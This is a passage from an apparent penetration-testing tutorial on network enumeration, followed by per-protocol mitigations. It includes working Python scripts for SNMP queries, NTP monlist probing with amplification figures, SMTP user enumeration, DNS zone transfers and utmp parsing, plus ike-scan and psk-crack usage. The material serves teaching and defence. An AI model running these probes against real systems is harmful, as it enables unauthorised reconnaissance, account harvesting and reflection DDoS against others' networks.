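"""SNMPv1 GetRequest/GetResponse encoded by hand (ASN.1 BER): what a manager sends to
UDP/161 and why knowing the community string is all it takes.
Added example, not the page's code; the sysDescr text in the constructed reply is fictitious."""
import socket

INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}
SYS_DESCR = "1.3.6.1.2.1.1.1.0"          # MIB-2 sysDescr.0

def tlv(tag, body):
    """Tag-Length-Value with short (<128) or long-form BER length."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    ln = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(ln)]) + ln + body

def ber_int(v):
    return tlv(INTEGER, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))

def ber_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:                       # base-128, high bit = more bytes follow
        chunk = [a & 0x7F]
        while a > 0x7F:
            a >>= 7
            chunk.append(0x80 | (a & 0x7F))
        out += bytes(reversed(chunk))
    return tlv(OID, bytes(out))

def build_message(pdu_tag, community, request_id, varbinds):
    """Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, PDU }
    PDU ::= [tag] { request-id, error-status, error-index, SEQUENCE OF VarBind }"""
    vbl = b"".join(tlv(SEQUENCE, ber_oid(oid) + val) for oid, val in varbinds)
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(SEQUENCE, vbl))
    return tlv(SEQUENCE, ber_int(0) + tlv(OCTET_STRING, community.encode()) + pdu)

def build_get_request(community, oid, request_id=0x1234):
    return build_message(0xA0, community, request_id, [(oid, tlv(NULL, b""))])

def read_tlv(buf, pos=0):
    """Return (tag, body, position after the element)."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def decode_oid(body):
    arcs, v = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        v = (v << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(v)
            v = 0
    return ".".join(map(str, arcs))

def decode_message(pkt):
    """Parse either direction; the community string is readable by anyone on the path."""
    _, msg, _ = read_tlv(pkt)
    _, ver, p = read_tlv(msg)
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    _, rid, q = read_tlv(pdu)
    _, err, q = read_tlv(pdu, q)
    _, _idx, q = read_tlv(pdu, q)
    _, vbl, _ = read_tlv(pdu, q)
    varbinds, q = [], 0
    while q < len(vbl):
        _, vb, q = read_tlv(vbl, q)
        _, oid, r = read_tlv(vb)
        vtag, val, _ = read_tlv(vb, r)
        if vtag == OCTET_STRING:
            value = val.decode("latin-1")
        elif vtag == INTEGER:
            value = int.from_bytes(val, "big", signed=True)
        elif vtag in (0x41, 0x42, 0x43):    # Counter32, Gauge32, TimeTicks
            value = int.from_bytes(val, "big")
        else:
            value = None                    # NULL placeholder in a request
        varbinds.append((decode_oid(oid), value))
    return {"version": int.from_bytes(ver, "big"), "community": community.decode("latin-1"),
            "pdu": PDU_TYPES.get(pdu_tag, hex(pdu_tag)),
            "request_id": int.from_bytes(rid, "big"), "error_status": err[0],
            "varbinds": varbinds}

def snmp_get(host, community="public", oid=SYS_DESCR, timeout=2.0):
    """Query a real agent on UDP/161 (only touches the network when called)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, oid), (host, 161))
        return decode_message(s.recv(4096))

def sample_get_response():
    """Constructed agent reply to build_get_request("public", SYS_DESCR); not a real capture."""
    value = tlv(OCTET_STRING, b"Linux core-sw1 5.10.0 #1 SMP x86_64")
    return build_message(0xA2, "public", 0x1234, [(SYS_DESCR, value)])
```

Swapping the PDU tag to 0xA1 and feeding each returned OID back in walks the whole MIB the way snmpwalk does; swapping in 0xA3 with the read/write string is the SetRequest that rewrites the configuration, which is why "private" left at its default matters more than "public".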
3. LDAP Enumeration:
 Lightweight Directory Access Protocol is an Internet protocol for accessing
distributed directory services.
 Directory services may provide any organized set of records, often in a
hierarchical and logical structure, for example, a corporate email directory.
 A client starts an LDAP session by connecting to a Directory System Agent
(DSA) on TCP port 389 and then sends an operation request to the DSA.
 Data is transmitted between the client and the server using Basic Encoding
Rules (BER).
 An attacker queries the LDAP service to gather information such as valid
usernames, addresses, departmental details, etc. that can be further used to
perform attacks. If the server permits anonymous binds, a simple
unauthenticated bind (ldapsearch -x with no -D) is enough to search the
directory.
 There are many LDAP enumeration tools that access the directory listings
within Active Directory or other directory services. Using these tools,
attackers can enumerate information such as valid usernames, addresses,
departmental details, etc. from different LDAP servers.
 Examples of these kinds of tools include LDAP Admin Tool, Active
Directory Explorer, LDAP Admin, etc.
4. NTP Enumeration:
 Network Time Protocol is designed to synchronize the clocks of networked
computers.
 It uses UDP port 123 as its primary means of communication.
 NTP can maintain time to within 10 milliseconds (1/100 second) over the
public Internet.
 It can achieve accuracy of 200 microseconds or better on a local area
network under ideal conditions.
 Administrators often overlook the NTP server when it comes to security.
However, if queried properly, it can provide valuable network information to
an attacker.
 Attackers query NTP servers to gather information such as the list of hosts
connected to the NTP server, the IP addresses of clients on the network,
their system names and operating systems, and internal IP addresses, which
can also be obtained if the NTP server is in the demilitarized zone (DMZ).
The classic queries are ntpdc's monlist (mode 7), which lists the server's
recent clients, and ntpq -c readvar (mode 6), which returns the server's
version, operating system and reference clock; both travel over UDP/123
without authentication.
 NTP enumeration tools are used to monitor the operation of SNTP and NTP
servers present in the network and also help in the configuration and
verification of connectivity from the time client to the NTP servers.
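The monlist query behind ntpdc -n -c monlist, as an added example: the 8-byte mode 7 MON_GETLIST_1 request, a parser for the reply that lists the server's recent clients, and the amplification ratio that made this query a DDoS vector. This is not code from the page or from the ntp project; the client addresses in the constructed reply are fictitious, and monlist() only touches the network when called.

```python
"""NTP mode 7 MON_GETLIST_1 ("monlist") probe and reply parser.
Added example, not the page's or ntp's code; the clients in sample_reply() are fictitious."""
import socket
import struct

MON_GETLIST_1, IMPL_XNTPD = 42, 3
ITEM = struct.Struct(">IIIIIIIHBBII16s16s")   # info_monitor_1: 72 bytes, network byte order
# 0x17 = response 0, more 0, version 2, mode 7; then sequence, implementation, request code,
# err/nitems = 0, mbz/size = 0: the whole probe is 8 bytes.
REQUEST = bytes([0x17, 0x00, IMPL_XNTPD, MON_GETLIST_1]) + b"\x00" * 4

def parse_monlist(pkt):
    """Return (more_packets_follow, [client dicts]) for one mode 7 reply packet."""
    if len(pkt) < 8 or pkt[0] & 0x07 != 7 or not pkt[0] & 0x80:
        raise ValueError("not a mode 7 response")
    more = bool(pkt[0] & 0x40)                  # 'more' bit: reply continues in another packet
    code = pkt[3]
    err_nitems, mbz_size = struct.unpack(">HH", pkt[4:8])
    err, nitems, size = err_nitems >> 12, err_nitems & 0x0FFF, mbz_size & 0x0FFF
    if err:
        raise ValueError("server returned error %d (monlist disabled or restricted?)" % err)
    if code != MON_GETLIST_1 or size != ITEM.size:
        raise ValueError("unexpected reply: code %d, item size %d" % (code, size))
    clients = []
    for i in range(nitems):
        (last, _first, _restr, count, addr, _daddr, _flags, port, mode, version,
         v6, _unused, addr6, _daddr6) = ITEM.unpack_from(pkt, 8 + i * size)
        ip = (socket.inet_ntop(socket.AF_INET6, addr6) if v6
              else socket.inet_ntoa(struct.pack(">I", addr)))
        clients.append({"client": ip, "port": port, "count": count, "mode": mode,
                        "version": version, "last_seen_s": last})
    return more, clients

def monlist(host, timeout=2.0):
    """Send the probe to UDP/123 and collect every reply packet (only runs when called)."""
    clients = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(REQUEST, (host, 123))
        more = True
        while more:
            more, part = parse_monlist(s.recv(4096))
            clients += part
    return clients

def amplification(reply):
    """Bytes returned per byte sent: the reason monlist is abused for reflection DDoS."""
    return len(reply) / len(REQUEST)

def sample_reply():
    """Constructed reply listing two fictitious clients (not a real capture)."""
    def item(ip, port, count, last, mode=3, version=4):
        a = struct.unpack(">I", socket.inet_aton(ip))[0]
        return ITEM.pack(last, 0, 0, count, a, 0, 0, port, mode, version, 0, 0,
                         b"\x00" * 16, b"\x00" * 16)
    body = item("10.0.0.15", 123, 4812, 12) + item("192.0.2.77", 41203, 3, 5309)
    header = bytes([0x97, 0x00, IMPL_XNTPD, MON_GETLIST_1]) + struct.pack(">HH", 2, ITEM.size)
    return header + body                        # 0x97: response bit set, version 2, mode 7
```

A full reply carries up to 600 clients across several packets, so even two entries give a 19x amplification here; a server that has monlist disabled answers with a non-zero err field instead of a list, which parse_monlist() reports rather than silently returning nothing.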
5. SMTP Enumeration:
 Mail systems commonly use SMTP together with POP3 and IMAP, which let users
keep messages in the server mailbox and download them periodically from the
server.
 SMTP uses Mail Exchange (MX) records in DNS to direct mail to the right
server. It runs on TCP port 25 (and TCP port 587 for message submission).
 SMTP provides three built-in commands that can be abused for enumeration:
VRFY (verify a mailbox), EXPN (expand a mailing list) and RCPT TO (name a
recipient).
 Servers respond differently to these commands for valid and invalid users,
from which we can determine the valid users on the SMTP server. A server
that answers VRFY with 252 ("cannot verify, will attempt delivery") for
every name has been configured not to leak this, but RCPT TO often still
does.
 Attackers can connect directly to SMTP through a telnet prompt and gather a
list of valid users on the server.
 Attackers can perform SMTP enumeration using command-line utilities such as
telnet, netcat, etc., or with tools such as Metasploit, Nmap, NetScanTools
Pro, etc.
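The three-command enumeration described above as an added example: it probes VRFY and EXPN with a name that cannot exist, only trusts a method when the server explicitly rejects that name, and otherwise falls back to RCPT TO (re-issuing MAIL FROM after each RSET, since RSET drops the whole transaction). This is not code from the page or from any of the tools it names. FakeSMTPServer is a constructed stand-in with Postfix-style reply texts (the host mail.example.test, the sentinel name and the users are fictitious); SocketSMTP is a real client that only connects when you instantiate it.

```python
"""SMTP user enumeration with VRFY, EXPN and RCPT TO.
Added example, not the page's code; FakeSMTPServer and its users are constructed."""
import re
import socket

ACCEPTED = {250, 251, 252}            # user/recipient accepted (252: "will try to deliver")
REJECTED = {550, 551, 553}            # no such mailbox / bad address
NOT_A_USER = "zz-no-such-user-7f3a"   # sentinel name that should never exist (assumption)

def _code(reply):
    return int(reply[:3])

def _classify(code):
    return "valid" if code in ACCEPTED else "invalid" if code in REJECTED else "unknown"

def enumerate_users(conn, candidates, domain):
    """conn.sendline(cmd) must return the full reply. Returns (method_used, {user: status}).
    VRFY/EXPN are only trusted when the server rejects the sentinel; a blanket 252 or a
    502 means the command leaks nothing, so fall back to RCPT TO."""
    conn.sendline("EHLO enum.example.test")
    results = {}
    for cmd in ("VRFY", "EXPN"):
        if _code(conn.sendline("%s %s" % (cmd, NOT_A_USER))) not in REJECTED:
            continue
        for user in candidates:
            results[user] = _classify(_code(conn.sendline("%s %s" % (cmd, user))))
        conn.sendline("QUIT")
        return cmd, results
    for user in candidates:
        conn.sendline("MAIL FROM:<probe@%s>" % domain)   # RSET clears MAIL FROM, so repeat it
        results[user] = _classify(_code(conn.sendline("RCPT TO:<%s@%s>" % (user, domain))))
        conn.sendline("RSET")
    conn.sendline("QUIT")
    return "RCPT TO", results

class SocketSMTP:
    """Minimal line client for a real server on TCP/25; handles multi-line replies."""
    def __init__(self, host, port=25, timeout=10):
        self.sock = socket.create_connection((host, port), timeout)
        self.fp = self.sock.makefile("rb")
        self.banner = self._reply()

    def _reply(self):
        lines = []
        while True:
            line = self.fp.readline().decode("latin-1").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":        # "250-" continues, "250 " ends
                return "\n".join(lines)

    def sendline(self, cmd):
        self.sock.sendall(cmd.encode() + b"\r\n")
        return self._reply()

class FakeSMTPServer:
    """Constructed stand-in. Default: VRFY answers 252 for everyone and EXPN is disabled,
    but RCPT TO still separates valid from invalid users. vrfy_leaks=True models a server
    that answers VRFY honestly."""
    def __init__(self, users, vrfy_leaks=False):
        self.users, self.vrfy_leaks, self.log = set(users), vrfy_leaks, []

    def sendline(self, line):
        self.log.append(line)
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "EHLO":
            return "250 mail.example.test"
        if cmd == "VRFY":
            if not self.vrfy_leaks:
                return "252 2.0.0 Cannot VRFY user, but will accept message and attempt delivery"
            if arg in self.users:
                return "250 2.1.5 %s <%s@example.test>" % (arg, arg)
            return "550 5.1.1 <%s>: Recipient address rejected: User unknown" % arg
        if cmd == "EXPN":
            return "502 5.5.2 Error: command not recognized"
        if cmd in ("MAIL", "RSET"):
            return "250 2.1.0 Ok"
        if cmd == "RCPT":
            user = re.search(r"<([^@>]+)", arg).group(1)
            if user in self.users:
                return "250 2.1.5 Ok"
            return "550 5.1.1 <%s@example.test>: Recipient address rejected: User unknown" % user
        if cmd == "QUIT":
            return "221 2.0.0 Bye"
        return "500 5.5.1 Error: command not recognized"
```

Against a real host, `enumerate_users(SocketSMTP("mail.example.test"), ["alice", "bob"], "example.test")` runs the same logic over TCP. Rate limiting and the "unknown" bucket matter in practice: a 4xx greylisting or tarpit reply is neither proof of a user nor of its absence, and the loop should not turn it into either.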
6. DNS Enumeration using Zone Transfer:
 It is the process of locating the DNS servers and the records of a target
network.
 An attacker can gather valuable network information such as DNS server
names, hostnames, machine names, usernames, IP addresses, etc. of the
target.
 In DNS zone transfer enumeration, an attacker tries to retrieve a copy of
the entire zone file for a domain from the DNS server.
 To execute a zone transfer, the attacker sends a zone transfer (AXFR)
request over TCP port 53 to the DNS server, pretending to be a secondary
name server; if the server does not restrict transfers, it sends its whole
database for that zone. This zone may contain a lot of information about the
network. A properly restricted server answers with REFUSED instead. The
request is what dig axfr @<name server> <domain> issues.
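The AXFR exchange end to end, as an added example: the query as sent over TCP, a walker for the reply (including the name compression pointers a real server uses), and a check that pulls out the private-address hosts a public zone should never contain. This is not code from the page or from dig/dnspython; the zone corp.example, its host names and addresses are fictitious and constructed in sample_axfr_response(), and zone_transfer() only touches the network when called.

```python
"""DNS zone transfer (AXFR) over TCP: build the query, walk the reply, and flag the
internal hosts a leaked zone exposes.
Added example, not the page's code; the zone, names and addresses in the constructed
reply are fictitious, and zone_transfer() only touches the network when called."""
import socket
import struct

AXFR, IN = 252, 1
TYPES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT", 28: "AAAA"}

def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"

def build_axfr_query(zone, txid=0xBEEF):
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # QDCOUNT=1, no flags
    return header + encode_name(zone) + struct.pack(">HH", AXFR, IN)

def read_name(msg, pos):
    """Decode a possibly compressed name; return (name, position after it)."""
    labels, end = [], None
    while True:
        ln = msg[pos]
        if ln & 0xC0 == 0xC0:                     # pointer back into an earlier name
            end = end if end is not None else pos + 2
            pos = struct.unpack(">H", msg[pos:pos + 2])[0] & 0x3FFF
            continue
        pos += 1
        if ln == 0:
            break
        labels.append(msg[pos:pos + ln].decode("ascii"))
        pos += ln
    return ".".join(labels) + ".", (pos if end is None else end)

def parse_records(msg):
    """Return [(name, type, ttl, value)] for one reply message."""
    _txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    if flags & 0xF:
        raise ValueError("transfer refused, RCODE %d" % (flags & 0xF))   # 5 = REFUSED
    pos = 12
    for _ in range(qd):                           # skip the echoed question
        _, pos = read_name(msg, pos)
        pos += 4
    records = []
    for _ in range(an):
        name, pos = read_name(msg, pos)
        rtype, _cls, ttl, rdlen = struct.unpack(">HHIH", msg[pos:pos + 10])
        pos += 10
        rdata = msg[pos:pos + rdlen]
        if rtype == 1:
            value = ".".join(str(b) for b in rdata)
        elif rtype in (2, 5):
            value, _ = read_name(msg, pos)
        elif rtype == 6:
            mname, p = read_name(msg, pos)
            rname, p = read_name(msg, p)
            value = "%s %s serial=%d" % (mname, rname, struct.unpack(">I", msg[p:p + 4])[0])
        else:
            value = rdata.hex()
        records.append((name, TYPES.get(rtype, str(rtype)), ttl, value))
        pos += rdlen
    return records

def zone_transfer(server, zone, port=53, timeout=5.0):
    """AXFR needs TCP: each message is length-prefixed; the zone ends at the second SOA."""
    records = []
    with socket.create_connection((server, port), timeout) as s:
        q = build_axfr_query(zone)
        s.sendall(struct.pack(">H", len(q)) + q)
        f = s.makefile("rb")
        while sum(r[1] == "SOA" for r in records) < 2:
            (length,) = struct.unpack(">H", f.read(2))
            records += parse_records(f.read(length))
    return records

def rfc1918_hosts(records):
    """A records in private space: exactly what a public zone should not publish."""
    def private(ip):
        a, b = (int(x) for x in ip.split(".")[:2])
        return a == 10 or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168)
    return sorted((n, v) for n, t, _ttl, v in records if t == "A" and private(v))

def sample_axfr_response():
    """Constructed reply for the fictitious zone corp.example (not a real capture)."""
    zone_ptr = b"\xc0\x0c"                         # compression pointer to the question name
    def rr(name, rtype, rdata, ttl=3600):
        return name + struct.pack(">HHIH", rtype, IN, ttl, len(rdata)) + rdata
    soa = rr(zone_ptr, 6, encode_name("ns1.corp.example.") + encode_name("hostmaster.corp.example.")
             + struct.pack(">IIIII", 2024010101, 7200, 900, 1209600, 300))
    answers = (soa + rr(zone_ptr, 2, encode_name("ns1.corp.example."))
               + rr(encode_name("ns1.corp.example."), 1, bytes([203, 0, 113, 53]))
               + rr(encode_name("vpn.corp.example."), 1, bytes([203, 0, 113, 7]))
               + rr(encode_name("intranet.corp.example."), 1, bytes([10, 0, 1, 20]))
               + rr(encode_name("backup.corp.example."), 1, bytes([192, 168, 5, 9])) + soa)
    header = struct.pack(">HHHHHH", 0xBEEF, 0x8400, 1, 7, 0, 0)    # QR=1, AA=1
    return header + encode_name("corp.example.") + struct.pack(">HH", AXFR, IN) + answers
```

The same parse_records() function is what tells you a fix worked: a hardened server returns RCODE 5 (REFUSED) to the first message and the function raises instead of returning records.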
7. IPsec Enumeration:
 IPsec uses ESP (Encapsulating Security Payload), AH (Authentication
Header), and IKE (Internet Key Exchange) to secure communication between
virtual private network (VPN) endpoints.
 Most IPsec-based VPNs use the Internet Security Association and Key
Management Protocol (ISAKMP), a part of IKE, to establish, negotiate, modify,
and delete Security Associations and cryptographic keys in a VPN environment.
 A simple scan for ISAKMP on UDP port 500 (and UDP port 4500 for NAT
traversal) can indicate the presence of a VPN gateway.
 Attackers can probe further with a tool such as ike-scan to identify
sensitive details including the encryption and hashing algorithms, the
authentication type, the key distribution (Diffie-Hellman) group, etc. that
the gateway accepts; with aggressive mode enabled, ike-scan -A also returns
the gateway's identity and a hash that psk-crack can attack offline.
8. VoIP(Voice over IP) Enumeration:
 VoIP uses the SIP (Session Initiation Protocol) to set up voice and video
calls over an IP network.
 SIP services generally use UDP/TCP port 5060, with TCP port 5061 for SIP
over TLS (SIPS); Cisco Skinny (SCCP) phones use TCP port 2000.
 VoIP enumeration provides sensitive information such as VoIP
gateways/servers, IP-PBX systems, client software, and user extensions (for
example from a SIP OPTIONS or REGISTER probe that returns a User-Agent
header, or answers differently for existing and non-existent extensions).
 This information can be used to launch various VoIP attacks such as DoS,
session hijacking, caller ID spoofing, eavesdropping, spam over Internet
telephony (SPIT), VoIP phishing (vishing), etc.
9. RPC Enumeration:
 Remote Procedure Call allows clients and servers to communicate in
distributed client/server programs.
 Enumerating RPC endpoints (rpcinfo -p against the portmapper on TCP/UDP
port 111) lets attackers identify any vulnerable services listening on the
dynamic ports registered behind it.
 In networks protected by firewalls and other security measures, the
portmapper is often filtered. Attackers therefore scan high port ranges to
identify RPC services that are exposed to direct attack.
10. Unix/Linux User Enumeration:
 One of the most vital steps in enumeration is to perform this kind of
enumeration. It provides a list of users along with details such as
username, hostname, and the start date and time of each session.
 We can use command-line utilities such as users, rwho, finger, etc. to
perform Linux user enumeration; locally, the same data comes from the utmp
(/var/run/utmp) and wtmp (/var/log/wtmp) login records.
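The session records that users, who and rwho read, parsed directly from the utmp format, as an added example: each live login yields the username, tty, originating host and address, PID and login time. This is not code from the page or from any of those utilities; it assumes the glibc utmp record layout on Linux x86_64 (384-byte records), and the records built by sample_utmp() are fictitious. read_utmp() reads the real file when called.

```python
"""Unix session enumeration straight from utmp: the data behind `users`, `who` and `rwho`.
Added example, not the page's code; assumes the glibc utmp layout (Linux x86_64);
the records in sample_utmp() are fictitious."""
import datetime
import socket
import struct

UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20s")    # struct utmp, glibc, little-endian
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8

def _cstr(b):
    return b.split(b"\x00", 1)[0].decode("utf-8", "replace")

def parse_utmp(data):
    """Return live user sessions (ut_type == USER_PROCESS) as dicts, in file order."""
    sessions = []
    for off in range(0, len(data) - UTMP.size + 1, UTMP.size):
        (ut_type, pid, line, _id, user, host, _term, _exit, _sess,
         tv_sec, _tv_usec, a0, _a1, _a2, _a3, _unused) = UTMP.unpack_from(data, off)
        if ut_type != USER_PROCESS:            # boot records and finished sessions are skipped
            continue
        sessions.append({
            "user": _cstr(user), "tty": _cstr(line), "host": _cstr(host), "pid": pid,
            "login_time": datetime.datetime.fromtimestamp(tv_sec, datetime.timezone.utc).isoformat(),
            # ut_addr_v6[0] carries the IPv4 address of a remote login in network byte order
            "addr": socket.inet_ntoa(struct.pack("<i", a0)) if a0 else None,
        })
    return sessions

def users_output(sessions):
    """Same shape as the `users` command: logged-in names, sorted, one per session."""
    return " ".join(sorted(s["user"] for s in sessions))

def read_utmp(path="/var/run/utmp"):
    """Parse the live login database (only reads the file when called)."""
    with open(path, "rb") as f:
        return parse_utmp(f.read())

def make_record(ut_type, pid, line, user, host, tv_sec, ip="0.0.0.0"):
    """Pack one utmp record; fixed-width fields are NUL-padded by struct."""
    a0 = struct.unpack("<i", socket.inet_aton(ip))[0]
    return UTMP.pack(ut_type, pid, line.encode(), b"", user.encode(), host.encode(),
                     0, 0, 0, tv_sec, 0, a0, 0, 0, 0, b"")

def sample_utmp():
    """Constructed utmp: a boot record, two live logins and one finished session."""
    t = 1700000000
    return (make_record(BOOT_TIME, 0, "~", "reboot", "6.1.0-generic", t - 86400)
            + make_record(USER_PROCESS, 4242, "pts/0", "alice", "10.0.0.5", t, "10.0.0.5")
            + make_record(USER_PROCESS, 4310, "tty1", "bob", "", t + 60)
            + make_record(DEAD_PROCESS, 3999, "pts/1", "carol", "10.0.0.9", t - 3600, "10.0.0.9"))
```

The same parser applied to /var/log/wtmp (same record format, appended rather than overwritten) gives the login history that last prints, which is why an attacker with a foothold reads both files and why the rwho/finger daemons that serve this data to the network are on the RPC mitigation list below.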
11. SMB Enumeration:
 SMB enumeration is an important skill for any pentester. Before learning
how to enumerate SMB, we should first understand what SMB is. SMB stands for
Server Message Block.
 It is a protocol for sharing resources such as files and printers, and in
general any resource that should be retrievable or made available by the
server. It runs on TCP port 445 (direct SMB) or TCP port 139 (SMB over the
NetBIOS session service), depending on the server.
 It is built into Windows, so Windows clients do not have to configure
anything beyond the basic setup. Linux is a little different: to make it
work, you have to install a Samba server, since Linux does not natively
speak SMB.
 Normally some form of authentication, such as a username and password, is
in place, and only certain resources are shared. So it is not the case that
everyone can access everything; strong authentication is expected.
 The most obvious flaw is the use of default or easily guessable
credentials, and sometimes no authentication at all (null sessions or guest
access), for important resources on the server. Administrators should make
sure to use strong passwords for users who need to access resources over
SMB. The second flaw is the Samba server itself: Samba has a history of
serious remotely exploitable vulnerabilities, so it must be kept patched.
Tools such as enum4linux, smbclient -L and Nmap's smb-* scripts enumerate
shares, users and the OS version over these ports.
Mitigation Of Different Types Of Enumeration

There are several countermeasures that can be applied to mitigate the
various kinds of enumeration:
1. NetBIOS Enumeration:
 Disable SMB and NetBIOS over TCP/IP (NetBT) on interfaces that do not need
them.
 Use a network firewall to block TCP/UDP ports 137-139 and TCP port 445 at
the perimeter.
 Prefer Windows Firewall / host-based software firewalls as well.
 Disable file and printer sharing where it is not required.
2. SNMP Enumeration:
 Remove the agent or turn off the SNMP service.
 If shutting off SNMP is not an option, change the default community string
names.
 Upgrade to SNMPv3, which encrypts passwords and messages (authPriv).
 Implement the Group Policy security option "Additional restrictions for
anonymous connections", and restrict which management stations may query
the agent (the SNMP service's "Accept SNMP packets from these hosts" list).
3. LDAP Enumeration:
 Use SSL/TLS (LDAPS on TCP port 636, or StartTLS on port 389) to encrypt
the traffic.
 Choose a username different from your email address and enable account
lockout.
 Disallow anonymous binds so that unauthenticated clients cannot search the
directory.
4. NTP Enumeration:
 Configure the NTP MD5 authentication layer (symmetric keys) between
servers and clients.
 Configure NTP authentication and restrict queries: in ntp.conf, "restrict
default noquery" and "disable monitor" stop mode 6/7 information requests
such as monlist.
 Upgrade the NTP version (monlist is disabled by default from ntp 4.2.7p26
onward).
5. SMTP Enumeration:
 Configure the server to ignore email messages to unknown recipients rather
than answering with detailed errors.
 Disable or restrict the VRFY and EXPN commands (for example
disable_vrfy_command = yes in Postfix).
 Disable the open relay feature.
 Limit the number of accepted connections from a single source to prevent
brute-force exploits.
 Do not include sensitive mail server and localhost information in mail
responses.
6. DNS Enumeration Using Zone Transfer:
 Disable DNS zone transfers to untrusted hosts (for example with BIND's
allow-transfer { <secondary addresses>; }; and TSIG-signed transfers).
 Make sure that private hosts and their IP addresses are not published in
the zone files of the public DNS server (split-horizon DNS keeps the
internal view separate).
 Use premium DNS registration services that hide sensitive information such
as host information from the public.
 Use standard network administrator contacts for DNS registration to avoid
social engineering attacks.
 Verify the fix with dig axfr @<your name server> <zone>, which should
report "Transfer failed." for any host that is not an authorized secondary.
7. IPsec Enumeration:
 Preshared keys used with IKE are open to brute-force attacks on the shared
secret. Aggressive mode is the worst case: the responder's authentication
hash goes out in the clear, so a single sniffed (or solicited) exchange can
be cracked offline against a dictionary. Use digital certificates or
two-factor authentication mechanisms to remove these threats.
 Pre-shared keys combined with aggressive mode IKE are a disaster waiting to
happen. If you must support aggressive mode IKE, use digital certificates
for authentication.
 Aggressively firewall and filter traffic flowing through the VPN encrypted
tunnel so that, in case of a compromise, network access is restricted. This
point is particularly important when giving mobile clients network access,
as opposed to branch offices.
 Where possible, limit inbound IPsec security associations to specific IP
addresses. This ensures that even if an attacker compromises a preshared
key, she cannot easily access the VPN.
8. VoIP(Voice over IP) Enumeration:
 These attacks can be suppressed by implementing SIPS (SIP over TLS) and
authenticating SIP requests and responses (which can include integrity
protection).
 The use of SIPS and the authentication of responses can suppress many
related attacks including eavesdropping and message or user impersonation.
 The use of digest authentication combined with TLS between SIP phones and
SIP proxies provides a channel through which clients can securely
authenticate within their SIP domain.
 Voicemail messages can be converted to text files and parsed by ordinary
spam filters. This can only protect users from SPIT voicemails.
9. RPC Enumeration:
 Do not run the rexd, rusersd, or rwalld RPC services, since they are of
negligible use and give attackers both useful information and direct access
to your hosts.
 In high-security environments, do not offer any RPC services to the public
Internet. Because of the complexity of these services, it is likely that
zero-day exploit scripts will be available to attackers before patch
information is released.
 To minimize the risk of internal or trusted attacks against necessary RPC
services (for example NFS components, including statd, lockd, and mountd),
install the latest vendor security patches.
 Aggressively filter egress traffic, where possible, to ensure that even if
an attack against an RPC service is successful, a connect-back shell cannot
be spawned to the attacker.
10. Unix/Linux User Enumeration:
 Keep the kernel patched and up to date.
 Never run any service as root unless really required, particularly web,
database, and file servers.
 The SUID bit should not be set on any program that lets you escape to a
shell.
 Never set the SUID bit on any file editor, compiler, or interpreter, as an
attacker can then read or overwrite any file on the system.
 Do not grant sudo rights to any program that lets you break out to a shell
(find / -perm -4000 -type f lists what is currently SUID so it can be
reviewed).
11. SMB Enumeration:
 Disable the SMB protocol on web and DNS servers.
 Disable the SMB protocol on Internet-facing servers.
 Block TCP ports 139 and 445, used by the SMB protocol, at the perimeter.
 Restrict anonymous (null session) access through the RestrictNullSessAccess
value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
and the RestrictAnonymous value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa
in the Windows Registry.
